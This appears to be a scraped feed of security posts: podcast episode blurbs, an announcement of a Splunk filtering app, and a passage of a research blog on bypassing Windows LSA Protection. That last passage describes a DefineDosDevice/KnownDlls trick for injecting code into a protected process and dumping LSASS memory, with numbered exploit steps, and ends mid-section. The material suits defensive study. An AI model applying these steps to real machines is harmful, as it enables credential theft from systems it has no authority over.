Alyssa Miller is a hacker, security researcher, advocate and international public speaker with over 15 years of experience in cybersecurity. From a young age, she has enjoyed exploring and deconstructing technology to learn more about how it works. At 12 years old, she bought her first computer. From that $1,000 purchase, she launched a hobby that would later become her career. Just seven years later, she was hired to her first full-time salary job as a programmer. Alyssa is also passionate that doing better in security begins with sharing knowledge and learning from each other. She regularly presents her perspectives through public speaking engagements. She speaks at various industry conferences, vendor and customer hosted events and non-security related events. Alyssa’s mission is to improve all aspects of the security community. Therefore, her topics range from technical to strategic to higher level community and policy issues.

Alyssa is a member of Women in Cyber Security (WiCyS) Racial Equity Committee. Additionally, she participates in other organizations designed to build a more welcoming and cooperative culture in security. As a member of ISACA, Alyssa currently holds a Certified Information Security Manager (CISM) certification. She is also the author of "The Cyber Defenders’ Career Guide," published by Manning in May 2021. We’re going to be discussing all of Alyssa’s fascinating story, her career journey, the work of demystifying cybersecurity and her work helping to create a more inclusive and welcoming space in the cybersecurity industry. 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

How hackathons can help propel your career | Guest Jonathan Tanner

Jonathan Tanner of Barracuda talks about his time moving up the ladder at Barracuda, how he still enjoys computer science competitions like DEFCON Wireless Capture the Flag (CTF), and Barracuda’s revolutionary malware detection ATP platform he built.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro
3:04 - Origin story in cybersecurity 
5:45 - Major accomplishments and moving up with Barracuda
7:55 - Daily work as senior security researcher 
10:36 - Was this always what you were interested in?
12:42 - How did you expand your skills and position
14:30 - Cyber security resume tips
17:20 - Becoming a cybersecurity professional
19:01 - How can hackathons and conferences help you?
22:33 - Improving the hiring process
25:33 - How to prepare for cyber security interview
27:46 - Working long term with a tech company
29:27 - What’s next for you at Barracuda?
30:26 - Where should security professionals begin?
33:46 - What’s happening at Barracuda
34:33 - Where can I find out more about you?
35:06 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Working as a cybersecurity researcher and industry analyst | Guest French Caldwell

French Caldwell of The Analyst Syndicate talks about his role as founder and chief researcher of the group. We also talk about Caldwell’s time at Gartner research, and his passion for cybersecurity research as a whole.

00:00 - Intro
03:43 - Caldwell’s background in cybersecurity
07:25 - Knowledge management
09:55 - Protecting digital trash
12:33 - Risk assessment and day-to-day work life
18:00 - How has research changed since 1999?
22:48 - Founding The Analyst Syndicate
26:45 - What is your day like at the Syndicate?
28:11 - What is your research like now?
29:33 - Disruptive technology and public policy
31:09 - Disruptive trends
34:30 - Advice to students in disruptive technologies
38:58 - Tell us about your simulator
46:22 - Cyberterrorism and risk to municipalities and hospitals
50:18 - Learn more about Caldwell and the Syndicate
51:54 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

French Caldwell is the leading strategist and thought leader in RegTech, including GRC and ESG, cybersecurity, social and digital risks and regulation and the impact of disruptive technologies on policy and strategy. He is a former Gartner Fellow, and following Gartner he became the global head of marketing at a Silicon Valley firm that delivers regtech solutions for governance, risk and compliance analytics and reporting. Skilled at the alignment of strategy, communications, technology, processes, analysis, policy and people to improve business and mission outcomes. Experienced at advising senior executives and corporate directors on disruptive technology, strategic risk management, cybersecurity and public policy issues.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Healthcare cybersecurity issues and legacy health systems | Guest Dirk Schrader

Dirk Schrader of New Net Technologies talks about healthcare security and legacy systems. We discuss the millions of pieces of health data left out in the open, the issues with closing these holes and the need for professional legacy system-whisperers.

0:00 - Intro
2:56 - What drew Dirk to security
4:46 - Did your Dad’s role inspire you?
5:55 - Stepping stones to your current job
9:35 - What is it like to be a security research manager
14:38 - Unprotected healthcare records
21:50 - Unprotected systems in the U.S.
25:20 - Using better security in hospitals
31:55 - Logistical issues of security for hospitals
37:48 - Best solution for hospital cybersecurity
39:30 - How to prepare for change
42:32 - What skills do you need for this work?
46:00 - Will people pursue these changes?
49:40 - Projects Dirk’s working on
52:10 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Dirk Schrader is the global VP of New Net Technologies (NNT). A native of Germany, Dirk’s work focusses on advancing cyber resilience as a sophisticated, new approach to tackle cyberattacks faced by governments and organizations of all sizes for the handling of change and vulnerability as the two main issues to address in information security.

Dirk has worked on cybersecurity projects around the globe, including more than four years in Dubai. He has published numerous articles in German and English about the need to address change and vulnerability to achieve cyber resilience, drawing on his experience and certifications as CISSP (ISC²) and CISM (ISACA). His recent work includes research in the area of medical devices, where he found hundreds of systems unprotected in the public internet, allowing access to sensitive patient data. This is going to be the topic of today’s episode, and we’re also going to talk about unprotected or poorly protected legacy systems in general, and how we start to build some coverage over this vast swath of unprotected information.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Splunk & advanced filtering with Event Masker

What is Splunk ?

Splunk is a Data-to-Everything Platform designed to ingest and analyze all kind of data. They can be visualized and correlated through Splunk searches, alerts, dashboards, and reports. Splunk is the #1 of 2020 Gartner Magic Quadrants in SIEMs for its performant analysis and visionary in Application Performance Management category.

Splunk and SCRT Analytics Team

SCRT provides its Splunk-based SIEM solution focused in first place on suspicious behavior detection through a custom library of use cases based on its on-field experience and know-how in Cyber Security.

SCRT chose Splunk Enterprise and Splunk Enterprise Security providing an integration with customer infrastructure and providing all the Splunk power to ingest, correlate, analyse and display valuable information for anomaly detection.

Nevertheless, Splunk has a lack of a viable solution for a proper whitelisting strategy that would enable users to delete part of their search results. For this purpose, SCRT has developed a custom Splunk app called “Event Masker” that provides filtering functionalities with a simple and powerful whitelist rules editor.

Event Masker

Event Masker provides filtering functionalities in Splunk, thereby permitting you to whitelist the events of your choice. Even though you can use Event Masker on any dashboard or query in the Splunk search bar, it was primarily built to reduce the number of false positives in Splunk Enterprise Security by better controlling its notable events.

Event Masker provides:

  • Rules management through an advanced interface that permits to create, import, export and edit rules properties. Each Rule contains a set of conditions, applied when Event Masker is called in a Splunk search command or correlation search.
Rules list interface
Rule’s properties
Rule’s conditions
  • The custom search command “mask” which permits to call Event Masker from the command line.

  • Some dashboards to audit the masked events and check the underlying rules.An audit log that permits to further track events that were masked over time
Event Masker Overview dashboard
Masked events over time
Rule logs

Release

Event Masker was released under CC BY-NC 4.0 and published on SplunkBase : https://splunkbase.splunk.com/app/5545/

We are pleased to provide this app freely to the Splunker’s community with a public GitHub repository https://github.com/scrt/event_masker/. Feel free to co-develop with us on this app to improve the Splunk experience and the efficiency of threats detections.

Many thanks to the whole SCRT Analytics team for its expertise and performance that permitted to achieve this great project.

Project management careers in the military and private sector | Guest Ginny Morton

Ginny Morton, project management professional at Dell and veteran in the U.S. Army, takes us through the practice of cybersecurity project management in both for-profit and military sectors on today’s episode. We talk about Scrum and Agile certifications, building the best team for the project and tapping into your personal power in your work. 

0:00 - Intro
2:04 - Origin story
4:47 - What does a cybersecurity project manager do?
6:10 - Average work day as a project manager
7:40 - Best and worst parts of project management
9:30 - How does a PM improve cybersecurity work?
10:40 - Dell team management
12:50 - Being the team’s first manager
14:36 - Best project management certifications
21:02 - PM work for Dell versus the military
23:00 - Military clearances for PM work
24:08 - Skills and experiences necessary for high-level PM
22:52 - Skills and interests for a successful career
27:04 - Tips for those who want to transition careers
27:38 - Changes to PM work during COVID
28:40 - Adjustments to work from home
29:55 - Will PM work change?
31:04 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Ginny Morton is a senior cyber security advisor, program management at Dell, and has spent much of her career in the project management space for cybersecurity, previously working at TekSystems and in both the Texas Army National Guard and the U.S. Army.

Our recent guest, project manager Jackie Olshack, recommended Morton for the show, and as we had a ton of people tune in to see Jackie’s episode, we realize that our listeners are passionate about learning more about project management in IT and cyber as a career path, so I’m looking forward to talking with Morton about her career path as well as the unique aspects of doing project management work on a federal/military level.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Data governance strategy in 2021 | Guest Rita Gurevich

This episode we welcome Rita Gurevich, CEO and founder of Sphere Technology Solutions. She talks about what it’s like to start her own company, why it is important to know your assets when setting policy, and what skills and experiences set applicants apart when they look to hire. Plus, she has plenty of data governance strategies to chat about. 

0:00​ - Intro
2:47​ - Origin story
4:51​ - The creation of Sphere
7:14​ - Working solo at Sphere
9:12​ - What would you change going back?
10:30​ - Pricing your business activities
12:36​ - Average day as a CEO
13:32​ - Favorite parts of the job
14:50​ - What is data governance?
17:40​ - Factors driving data growth
19:28​ - First steps to form data strategy
22:07​ - Data governance best practices
23:40​ - Time frame to get a master inventory
25:17​ - What does good data governance do
26:12​ - Skills I need for data governance and management
27:47​ - Importance of collaboration and mentorship
30:26​ - Skills and experiences for Sphere candidates
32:48​ - Tips to get into cybersecurity work
34:06​ - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

As the CEO and Founder of Sphere, Rita Gurevich is charged with leading the strategic growth of the organization in providing business critical governance, security and compliance solutions to customers spanning multiple geographic locations and industry verticals.

Gurevich founded Sphere after gaining a massive amount of experience in a short time period during the Lehman bankruptcy, the economic downturn of 2008, and the enhanced regulatory environment that dominated the industry. Being in a unique position from this experience, Gurevich founded Sphere as a single contributor, and worked strategically to grow the company into the entity it is today.

Gurevich is the recipient of multiple honors and awards including recognition from her Entrepreneurial skills from Ernst & Young, and SmartCEO, along with being on the 40 Under 40 list in 2017. In addition, Gurevich sits on the Board of Directors for the New Jersey Technology Council.

This week’s topic is data governance strategies in 2021. As more of what we do goes online and into the cloud, and as more people need access to information, making sure that entrance points aren’t more accessible than they need to be is more important than ever. We’re going to talk about the issues around this topic, and also job strategies for people who want to do this type of work.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Lessons cybersecurity can learn from physical security | Guest Jeff Schmidt

This episode we welcome Jeff Schmidt of Covail to discuss security and risk management, working at the FBI to create the InfraGard program, and what cybersecurity can learn from physical security controls and fire safety and protection.

0:00 - Intro
2:30 - Origin story
4:31 - Stepping stones throughout career
8:00 - Average work day
12:14 - Learning from physical security
17:18 - Deficiencies in detection
22:17 - Which security practices need to change?
24:15 - How massive would this change be?
27:37 - Skills needed for real-time detection
32:00 - Strategies to get into cybersecurity
34:30 - Final words on the industry
37:16 - What is Covail?
38:40 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Jeff Schmidt, VP and Chief Cyber Security Innovator at Covail is an accomplished cybersecurity expert with a background in security and risk management. He founded JAS Global Advisors LLC, a security consulting firm in Chicago, and Authis, a provider of innovative risk-managed identity services for the financial sector. Jeff is a board member for Delta Risk LLC. In 1998, he worked with the FBI to create the InfraGard program, receiving commendations from the Attorney General and the Director of the FBI. He is an adjunct professor of systems security engineering at the Stevens Institute of Technology and a Zurich Cyber Risk Fellow, Cyber Statecraft Initiative, at The Atlantic Council. Jeff received a Bachelor of Science in computer information systems and an MBA from the Fisher College of Business at The Ohio State University.

Jeff came to us with an intriguing topic. He proposes what he calls a Detect, Defend, and Respond Posture in Cybersecurity, and postulates that cybersecurity can learn lessons from “the mature sciences of physical security and fire protection.” No matter how you’re securing your system now, there’s often room for improvement, and always room for taking in new ideas, so let’s take a closer look!

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Supporting economic advancement among women in cybersecurity | Guest Christina Van Houten

Christina Van Houten talks about Women@Work and women in cybersecurity on this week's episode. We discuss tactics for bringing more women and diverse candidates into cybersecurity, the importance of a well-balanced and skills-diverse team, and how the work of Chief Strategy Officer is like an ever-evolving game of Tetris! 

0:00 - Intro
2:30 - Van Houten's origin story
4:13 - Strategies cybersecurity was lacking
7:05 - Accomplishments that helped bolster her career
13:46 - Average day as chief strategy officer
18:03 - Entering cybersecurity in different ways
20:37 - Women@Work and trying to help
26:27 - Bringing more women into cybersecurity
29:20 - Making careers accessible to women
34:14 - Diversifying upper management 
36:22 - Success stories mentoring women
41:01 - Men@Work book and men in cybersecurity
46:33 - Roadblocks women in cybersecurity face
50:47 - Projects from Mimecast
54:37 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Christina Van Houten is a veteran of the enterprise technology industry, having spent two decades with some of the world’s largest firms, including Oracle, IBM and Infor Global Solutions as well as Netezza and ProfitLogic, the entrepreneurial companies that were acquired by them. Currently, Christina is chief strategy officer for Mimecast, a global leader in cybersecurity, where she leads product management, market strategy, corporate development, and M&A. She also serves on the board of directors for TechTarget and has been involved as an advisory board member of several emerging technology firms. In 2017, Christina launched Women@Work, a resource platform dedicated to the economic advancement and self-reliance of women and girls around the world.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Bypassing LSA Protection in Userland

In 2018, James Forshaw published an article in which he briefly mentioned a trick that could be used to inject arbitrary code into a PPL as an administrator. However, I feel like this post did not get the attention it deserved as it literally described a potential Userland exploit for bypassing PPL (which includes LSA Protection).

Introduction

I was doing some research on Protected Processes when I stumbled upon the following blog post: Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege. This post was written by James Forshaw on Project Zero’s blog in August 2018. As the title implies, the objective was to discuss a particular privilege escalation trick, not a PPL bypass. However, the following sentence immediately caught my eye:

Abusing the DefineDosDevice API actually has a second use, it’s an Administrator to Protected Process Light (PPL) bypass.

As far as I know, all the public tools for bypassing PPL that have been released so far involve the use of a driver in order to execute arbitrary code in the Kernel (with the exception of pypykatz as I mentioned in my previous post). In his blog post though, James Forshaw casually gave us a Userland bypass trick on a plate, and it seems it went quite unnoticed by the pentesting community.

The objective of this post is to discuss this technique in more details. I will first recap some key concepts behind PPL processes, and I will also explain one of the major differences between a PP (Protected Process) and a PPL (Protected Process Light). Then, we will see how this slight difference can be exploited as an administrator. Finally, I will introduce the tool I developed to leverage this vulnerability and dump the memory of any PPL without using any Kernel code.

Background

I already laid down all the core principles behind PP(L)s on my personal blog here: Do You Really Know About LSA Protection (RunAsPPL)?. So, I would suggest reading this post first but here is a TL;DR.

PP(L) Concepts – TL;DR

When the PP model was first introduced with Windows Vista, a process was either protected or unprotected. Then, beginning with Windows 8.1, the PPL model extended this concept and introduced protection levels. The immediate consequence is that some PP(L)s can now be more protected than others. The most basic rule is that an unprotected process can open a protected process only with a very restricted set of access flags such as PROCESS_QUERY_LIMITED_INFORMATION. If they request a higher level of access, the system will return an Access is Denied error.

For PP(L)s, it’s a bit more complicated. The level of access they can request depends on their own level of protection. This protection level is partly determined by a special EKU field in the file’s digital certificate. When a protected process is created, the protection information is stored in a special value in the EPROCESS Kernel structure. This value stores the protection level (PP or PPL) and the signer type (e.g.: Antimalware, Lsa, WinTcb, etc.). The signer type establishes a sort of hierarchy between PP(L)s. Here are the basic rules that apply to PP(L)s:

  • A PP can open a PP or a PPL with full access if its signer type is greater or equal.
  • A PPL can open a PPL with full access if its signer type is greater or equal.
  • A PPL cannot open a PP with full access, regardless of its signer type.

For example, when LSA Protection is enabled, lsass.exe is executed as a PPL, and you will observe the following protection level with Process Explorer: PsProtectedSignerLsa-Light. If you want to access its memory you will need to call OpenProcess and specify the PROCESS_VM_READ access flag. If the calling process is not protected, this call will immediately fail with an Access is Denied error, regardless of the user’s privileges. However, if the calling process were a PPL with a higher level (WinTcb for instance), the same call would succeed (as long as the user has the appropriate privileges obviously). As you will have understood, if we are able to create such a process and execute arbitrary code inside it, we will be able to access LSASS even if LSA Protection is enabled. The question is: can we achieve this goal without using any Kernel code?

PP vs PPL

The PP(L) model effectively prevents an unprotected process from accessing protected processes with extended access rights using OpenProcess for example. This prevents simple memory access, but there is another aspect of this protection I did not mention. It also prevents unsigned DLLs from being loaded by these processes. This makes sense, otherwise the overall security model would be pointless as you could just use any form of DLL hijacking and inject arbitrary code into your own PPL process. This also explains why a particular attention should be paid to third-party authentication modules when enabling LSA Protection.

There is one exception to this rule though! And this is probably where the biggest difference between a PP and a PPL lies. If you know about the DLL search order on Windows, you know that, when a process is created, it first goes through the list of “Known DLLs”, then it continues with the application’s directory, the System directories and so on… In this search order, the “Known DLLs” step is a special one and is usually taken out of the equation for DLL hijacking exploits because a user has no control over it. Though, in our case, this step is precisely the “Achille’s heel” of PPL processes.

The “Known DLLs” are the DLLs that are most commonly loaded by Windows applications. Therefore, to increase the overall performance, they are preloaded in memory (i.e. they are cached). If you want to see the complete list of “Known DLLs”, you can use WinObj and take a look a the content of the \KnownDlls directory within the object manager.

WinObj – Known DLLs

Since these DLLs are already in memory, you should not see them if you use Process Monitor to check the file operations of a typical Windows application. Things are a bit different when it comes to Protected Processes though. I will take SgrmBroker.exe as an example here.

Known DLLs loaded by a Protected Process

As we can see in Process Explorer, SgrmBroker.exe was started as a Protected Process (PP). When the process starts, the very first DLLs that are loaded are kernel32.dll and KernelBase.dll, which are both… …”Known DLLs”. Yes, in the case of a PP, even the “Known DLLs” are loaded from the disk, which implies that the digital signature of each file is always verified. However, if you do the same test with a PPL, you will not see these DLLs in Process Monitor as they behave like normal processes in this case.

This fact is particularly interesting because the digital signature of a DLL is only verified when the file is mapped, i.e. when a Section is created. This means that, if you are able to add an arbitrary entry to the \KnownDlls directory, you can then inject an arbitrary DLL and execute unsigned code in a PPL.

Adding an entry to \KnownDlls is easier said than done though because Microsoft already considered this attack vector. As explained by James Forshaw in his blog post, the \KnownDlls object directory is marked with a special Process Trust Label as you can see on the screenshot below.

KnownDlls directory Process Trust Label

As you may imagine, based on the name of the label, only protected processes that have a level higher than or equal to WinTcb – which is actually the highest level for PPLs – can request write access to this directory. But all is not lost as this is exactly where the clever trick found by JF comes into play.

MS-DOS Device Names

As mentioned in the introduction, the technique found by James Forshaw relies on the use of the API function DefineDosDevice, and involves some Windows internals that are not easy to grasp. Therefore, I will first recap some of these concepts here before dealing with the method itself.

DefineDosDevice?

Here is the prototype of the DefineDosDevice function:

BOOL DefineDosDeviceW(
  DWORD   dwFlags,
  LPCWSTR lpDeviceName,
  LPCWSTR lpTargetPath
);

As suggested by its name, the purpose of the DefineDosDevice is to literally define MS-DOS device names. An MS-DOS device name is a symbolic link in the object manager with a name of the form \DosDevices\DEVICE_NAME (e.g.: \DosDevices\C:) as explained in the documentation. So, this function allows you to map an actual “Device” to a “DOS Device”. This is exactly what happens when you plug in an external drive or a USB key for example. The device is automatically assigned a drive letter, such as E:. You can get the corresponding mapping by invoking QueryDosDevice.

WCHAR path[MAX_PATH + 1];

if (QueryDosDevice(argv[1], path, MAX_PATH)) {
    wprintf(L"%ws -> %ws\n", argv[1], path);
}
Querying an MS-DOS device’s mapping

In the above example, the target device is \Device\HarddiskVolume5 and the MS-DOS device name is E:. But wait a minute, I said that an MS-DOS device name was of the form \DosDevices\DEVICE_NAME. So, this cannot be just a drive letter. No worries, there is an explanation. For both DefineDosDevice and QueryDosDevice, the \DosDevices\ part is implicit. These functions automatically prepend the “device name” with \??\. So, if you provide E: as the device name, they will use the NT path \??\E: internally. Even then, you will tell me that \??\ is still not \DosDevices\, and this would be a valid point. Once again, WinObj will help us solve this “mystery”. In the root directory of the object manager, we can see that \DosDevices is just a symbolic link that points to \??. As a result, \DosDevices\E: -> \??\E:, so we can consider them as the same thing. This symbolic link actually exists for legacy reasons because, in older versions of Windows, there was only one DOS device directory.

WinObj – DosDevices symbolic link

Local DOS Device Directories

The path prefix \??\ itself has a very special meaning. It represents the local DOS device directory of a user and therefore refers to different locations in the object manager, depending on the current user’s context. Concretely, \?? refers to the full path \Sessions\0\DosDevices\00000000-XXXXXXXX, where XXXXXXXX is the user’s logon authentication ID. There is one exception though, for NT AUTHORITY\SYSTEM, \?? refers to \GLOBAL??. This concept is very important so I will take two examples to illustrate it. The first one will be the USB key I used previously and the second one will be an SMB share I manually mount through the Explorer.

In the case of the USB key, we already saw that \??\E: was a symbolic link to \Device\HarddiskVolume5. As it was mounted by SYSTEM, this link should exist within \GLOBAL??\. Let’s verify that with WinObj.

WinObj – \GLOBAL??\E: symbolic link

Everything is fine! Now, let’s map an “SMB share” to a drive letter and see what happens.

Mapping a Network Drive

This time, the drive is mounted as the logged-on user, so \?? should refer to \Sessions\0\DosDevices\00000000-XXXXXXXX, but what is the value of XXXXXXXX? To find it, I will use Process Hacker and check the advanced properties of my explorer.exe process’ primary access token.

Process Hacker – Explorer’s token advanced properties

The authentication ID is 0x1abce so the symbolic link should have been created inside \Sessions\0\DosDevices\00000000-0001abce. Once again, let’s verify that with WinObj.

WinObj – SMB share symbolic link

There it is! The symbolic link was indeed created in this directory.

Why DefineDosDevice?

As we saw in the previous part, the device mapping operation consists of a simple symbolic link creation in the caller’s DOS device directory. Any user can do that as it affects only their session. But there is a problem, because low-privileged users can only create “Temporary” kernel objects, which are removed once all their handles have been closed. To solve this problem, the object must be marked as “Permanent“, but this requires a particular privilege (SeCreatePermanentPrivilege) which they do not have. So, this operation must be performed by a privileged service that has this capability.

The symbolic link is marked as “Permanent”

As outlined by JF in his blog post, DefineDosDevice is just a wrapper for an RPC method call. This method is exposed by the CSRSS service and is implemented in BaseSrvDefineDosDevice inside BASESRV.DLL. What is special about this service is that it runs as a PPL with the protection level WinTcb.

CSRSS service runing as a PPL (WinTcb)

Although this is a requirement for our exploit, it is not the most interesting fact about DefineDosDevice. What is even more interesting is that the value of lpDeviceName is not sanitized. This means that you are not bound to provide a drive letter such as E:. We will see how we can leverage this to trick the CSRSS service into creating an arbitrary symbolic link in an arbitrary location such as \KnownDlls.

Exploiting DefineDosDevice

In this part, we will take a deep dive into the DefineDosDevice function. We will see what kind of weakness lies inside it and how we can exploit it to reach our goal.

The Inner Workings of DefineDosDevice

In his article, JF did all the heavy lifting as he reversed the BaseSrvDefineDosDevice function and provided us with the corresponding pseudo-code. You can check it out here. If you do so, you should note that there is slight mistake at step 4 though, it should be CsrImpersonateClient(), not CsrRevertToSelf(). Anyway, rather than copy-pasting his code, I will try to provide a high-level overview using a diagram instead.

Overview of BaseSrvDefineDosDevice

In this flowchart, I highlighted some elements with different colors. The impersonation functions are in orange and the symbolic link creation steps are in blue. Finally, I highlighted the critical path we need to take in red.

First, we can see that the CSRSS service tries to open \??\DEVICE_NAME while impersonating the caller (i.e. the RPC client). The main objective is to delete the symbolic link first if it already existed. But there is more to it, the service will also check whether the symbolic link is “global”. For that purpose, an internal function, which is not represented here, simply checks whether the “real” path of the object starts with \GLOBAL??\. If so, impersonation is disabled for the rest of the execution and the service will not impersonate the client prior to the NtCreateSymbolicLinkObject() call, which means that the symbolic link will be created by the CSRSS service itself. Finally, if this operation succeeds, the service marks the object as “Permanent” as I mentioned earlier.

A Vulnerability?

At this point you may have realized that there is a sort of TOCTOU (Time-of-Check Time-of-Use) vulnerability. The path used to open the symbolic link and the path used to create it are the same: \??\DEVICE_NAME. However, the “open” operation is always done while impersonating the user whereas the “create” operation might be done directly as SYSTEM if impersonation is disabled. And, if you remember what I explained earlier, you know that \?? represents a user’s local dos device directory and therefore resolves to different paths depending on the user’s identity. So, although the same path is used in both cases, it may well refer to completely different locations in reality!

In order to exploit this behavior, we must solve the following challenge: we need to find a “device name” that resolves to a “global object” we control when the service impersonates the client. And this same “device name” must resolve to \KnownDlls\FOO.dll when impersonation is disabled. This sounds a bit tricky, but we will go through it step by step.

Let’s begin with the easiest part first. We need to determine a value for DEVICE_NAME in \??\DEVICE_NAME such that this path resolves to \KnownDlls\FOO.dll when the caller is SYSTEM. We also know that \?? resolves to \GLOBAL?? in this case.

If you check the content of the \GLOBAL??\ directory, you will see that there is a very convenient object inside it.

WinObj – The “real” GLOBALROOT

In this directory, the GLOBALROOT object is a symbolic link that points to an empty path. This means that a path such as \??\GLOBALROOT\ would translate to just \, which is the root of the object manager (hence the name “global root”). If we apply this principle to our “device name”, we know that \??\GLOBALROOT\KnownDlls\FOO.DLL would resolve to \KnownDlls\FOO.dll when the caller is SYSTEM. This is one part of the problem solved!

Now, we know that we should supply GLOBALROOT\KnownDlls\FOO.DLL as the “device name” for the DefineDosDevice function call (remember that \??\ will be automatically prepended to this value). If we want the CSRSS service to disable impersonation, we also know that the symbolic link object must be considered as “global” so its path must start with \GLOBAL??\. So, the question is: how do you transform a path such as \??\GLOBALROOT\KnownDlls\FOO.DLL into \GLOBAL??\KnownDlls\FOO.dll? The solution is actually quite straightforward as this is pretty much the very definition of a symbolic link! When the service impersonates the user, we know that \?? refers to the local DOS device directory of this particular user, so all you have to do is create a symbolic link such that \??\GLOBALROOT points to \GLOBAL??, and that’s it.

To summarize, when the path is opened by a user other than SYSTEM:

\??\GLOBALROOT\KnownDlls\FOO.dll
-> \Sessions\0\DosDevices\00000000-XXXXXXXX\GLOBALROOT\KnownDlls\FOO.dll

\Sessions\0\DosDevices\00000000-XXXXXXXX\GLOBALROOT\KnownDlls\FOO.dll
-> \GLOBAL??\KnownDlls\FOO.dll

On the other hand, if the same path is opened by SYSTEM:

\??\GLOBALROOT\KnownDlls\FOO.dll
-> \GLOBAL??\GLOBALROOT\KnownDlls\FOO.dll

\GLOBAL??\GLOBALROOT\KnownDlls\FOO.dll
-> \KnownDlls\FOO.dll

There is one last thing that needs to be taken care of. Before checking whether the object is “global” or not, it must first exist, otherwise the initial “open” operation would just fail. So, we need to make sure that \GLOBAL??\KnownDlls\FOO.dll is an existing symbolic link object prior to calling DefineDosDevice.

WinObj – Permissions of \GLOBAL??

There is a slight issue here. Administrators cannot create objects or even directories within \GLOBAL??. This is not really a problem; this just adds an extra step to our exploit as we will have to temporarily elevate to SYSTEM first. As SYSTEM, we will be able to first create a fake KnownDlls directory inside \GLOBAL??\ and then create a dummy symbolic link object inside it with the name of the DLL we want to hijack.

The Full Exploit

There is a lot of information to digest so, here is a short recap of the exploit steps before we discuss the last considerations. In this list, we assume we are executing the exploit as an administrator.

  1. Elevate to SYSTEM, otherwise we will not be able to create objects inside \GLOBAL??.
  2. Create the object directory \GLOBAL??\KnownDlls to mimic the actual \KnownDlls directory.
  3. Create the symbolic link \GLOBAL??\KnownDlls\FOO.dll, where FOO.dll is the name of the DLL we want to hijack. Remember that what matters is the name of the link itself, not its target.
  4. Drop the SYSTEM privileges and revert to our administrator user context.
  5. Create a symbolic link in the current user’s DOS device directory called GLOBALROOT and pointing to \GLOBAL??. This step must not be done as SYSTEM because we want to create a fake GLOBALROOT link inside our own DOS directory.
  6. This is the centerpiece of this exploit. Call DefineDosDevice with the value GLOBALROOT\KnownDlls\FOO.dll as the device name. The target path of this device is the location of the DLL but I will get to that in the next part.

Here is what happens inside the CSRSS service at the final step. It first receives the value GLOBALROOT\KnownDlls\FOO.dll and prepends it with \??\ so this yields the device name \??\GLOBALROOT\KnownDlls\FOO.dll. Then, it tries to open the corresponding symbolic link object while impersonating the client.

\??\GLOBALROOT\KnownDlls\FOO.dll
-> \Sessions\0\DosDevices\00000000-XXXXXXXX\GLOBALROOT\KnownDlls\FOO.dll
-> \GLOBAL??\KnownDlls\FOO.dll

Since the object exists, it will check if it’s global. As you can see, the “real” path of the object starts with \GLOBAL??\ so it’s indeed considered global, and impersonation is disabled for the rest of the execution. The current link is deleted and a new one is created, but this time, the RPC client is not impersonated, so the operation is done in the context of the CSRSS service itself as SYSTEM:

\??\GLOBALROOT\KnownDlls\FOO.dll
-> \GLOBAL??\GLOBALROOT\KnownDlls\FOO.dll
-> \KnownDlls\FOO.dll

Here we go! The service creates the symbolic link \KnownDlls\FOO.dll with a target path we control.

DLL Hijacking through Known DLLs

Now that we know how to add an arbitrary entry to the \KnownDlls directory, we should come back to our original problem, and our exploit constraints.

Which DLL to Hijack?

